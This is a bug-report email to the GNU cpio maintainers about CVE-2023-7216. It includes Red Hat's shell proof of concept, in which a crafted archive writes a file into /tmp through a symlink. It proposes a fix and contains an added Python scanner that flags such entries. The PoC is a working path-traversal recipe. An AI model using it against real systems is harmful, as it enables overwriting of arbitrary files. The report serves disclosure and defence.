Dear cpio maintainer:
This is a Red Hat Community Report on CVE-2023-7216: https://bugzilla.redhat.com/show_bug.cgi?id=2249901
CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.
The Red Hat PoC for CVE-2023-7216 can be reproduced with the following steps:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```
First of all, I would like to confirm with you: do you accept CVE-2023-7216? Is CVE-2023-7216 a bug, or is it the default behavior of the cpio software?
If CVE-2023-7216 is a bug, I will try to provide a fix patch. Of course, if there is a better fix, please point it out.
CVE-2023-7216 is similar to CVE-2015-1197; both of them use a symlink to cause path traversal. The CVE-2015-1197 fix uses symlink_placeholder() to fix a path traversal issue in the --no-absolute-filenames scenario. However, CVE-2023-7216 proves that path traversal also exists in other scenarios.
So I made a patch to fix CVE-2023-7216: copyin_link() should enable symlink_placeholder() by default, not only when the --no-absolute-filenames option is on.
I look forward to your feedback and suggestions soon.
Best Regards,
Peng
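As an added illustration of the symlink-then-child pattern in the report above (example code written for this page, not cpio's own code and not the patch proposed in the message), here is a Python pre-extraction scan: it parses a cpio archive and reports every entry whose path passes through a symlink created by an earlier entry, which is exactly the ordering cpio -i relies on when it writes tmp/trav.txt through the tmp -> /tmp/ link. It assumes the ASCII newc format (cpio -H newc) rather than the default binary format the session above produces, and the demo archive is constructed inside the script to mirror the report; absolute paths and ".." components are flagged as well.

```python
# Added example, not cpio's own code: pre-extraction scan for entries that would
# be written through a symlink created earlier in the same archive. Assumes the
# ASCII "newc" cpio format; the demo archive below is constructed here.
import posixpath

NEWC_MAGIC = b"070701"
S_IFMT = 0o170000
S_IFLNK = 0o120000
TRAILER = "TRAILER!!!"


def newc_entry(name, mode, data=b""):
    """Serialize one newc entry: 110-byte ASCII header, NUL-terminated name,
    then data; header+name and data are each padded to a 4-byte boundary."""
    name_b = name.encode() + b"\0"
    # ino, mode, uid, gid, nlink, mtime, filesize, devmajor, devminor,
    # rdevmajor, rdevminor, namesize (incl. NUL), check
    fields = [1, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
    hdr = NEWC_MAGIC + b"".join(b"%08X" % f for f in fields) + name_b
    hdr += b"\0" * (-len(hdr) % 4)
    return hdr + data + b"\0" * (-len(data) % 4)


def build_demo_archive():
    """Constructed archive mirroring the report: a symlink entry 'tmp' -> /tmp/
    followed by a regular file whose path goes through that symlink."""
    return (newc_entry("tmp", S_IFLNK | 0o777, b"/tmp/")
            + newc_entry("tmp/trav.txt", 0o100644, b"TEST Traversal\n")
            + newc_entry(TRAILER, 0))


def parse_newc(buf):
    """Return [(name, mode, data), ...] for a newc archive, stopping at the trailer."""
    entries, off = [], 0
    while True:
        if buf[off:off + 6] != NEWC_MAGIC:
            raise ValueError("bad newc magic at offset %d" % off)
        fields = [int(buf[off + 6 + 8 * i:off + 14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = fields[1], fields[6], fields[11]
        name_start = off + 110
        name = buf[name_start:name_start + namesize - 1].decode()
        data_start = name_start + namesize
        data_start += -data_start % 4          # header+name padded to 4 bytes
        if name == TRAILER:
            return entries
        entries.append((name, mode, buf[data_start:data_start + filesize]))
        off = data_start + filesize
        off += -off % 4                        # data padded to 4 bytes


def find_symlink_traversals(entries):
    """Flag entries that an in-order extractor would write through a symlink
    created by an earlier entry (the report's pattern), plus absolute paths
    and '..' components. Archive order matters: cpio creates entries in order."""
    symlinks, findings = {}, []
    for name, mode, data in entries:
        norm = posixpath.normpath(name)
        parts = norm.split("/")
        if norm.startswith("/") or ".." in parts:
            findings.append((name, "absolute path or '..' component"))
        for i in range(1, len(parts)):
            prefix = "/".join(parts[:i])
            if prefix in symlinks:
                findings.append((name, "path passes through symlink %s -> %s"
                                 % (prefix, symlinks[prefix])))
                break
        if (mode & S_IFMT) == S_IFLNK:
            symlinks[norm] = data.decode(errors="replace")
    return findings


if __name__ == "__main__":
    for name, why in find_symlink_traversals(parse_newc(build_demo_archive())):
        print("REJECT %s: %s" % (name, why))
```

Running the script on the constructed archive rejects tmp/trav.txt because its first path component is the symlink entry that precedes it. The scan only keys on archive order, which is what makes the report's sequence work: a regular file placed before the symlink entry would cause the extractor to create a real directory first, so the check deliberately does not flag that ordering.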
------------------ Original ------------------
From: "2773414454" <2773414454@qq.com>;
Date: Tue, Feb 20, 2024 11:03 AM
To: "bug-cpio"<bug-cpio@gnu.org>;
Subject: Is there a fix for this CVE-2023-7216?
Dear cpio maintainer:
https://nvd.nist.gov/vuln/detail/CVE-2023-7216
NVD does not provide any related patch information.
Is there a fix for cpio's CVE-2023-7216?
[1] If not, what is the repair plan for cpio?
[2] If yes, can you indicate which submissions fix CVE-2023-7216?
peng